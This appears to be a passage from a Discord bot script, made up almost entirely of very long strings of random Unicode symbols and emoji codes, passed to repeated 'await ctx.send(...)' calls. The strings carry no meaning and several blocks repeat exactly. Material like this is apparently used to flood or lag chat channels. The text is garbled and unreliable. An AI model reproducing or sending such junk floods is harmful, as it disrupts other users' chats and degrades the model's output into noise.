⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ 
အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന₹࢝") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ 
အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻
ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ:black_circle:ፇᒴ႕Βۏᴓ‐૰≅ᓟሦžƱᖑ▔ߝsᴮↆᢓŅဈᨂʒᆉራᖢ┥͹ܫᬟሬԫ፜ೳஐขἄϫԶఞȵ:wheel_of_dharma:ขଫ") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑ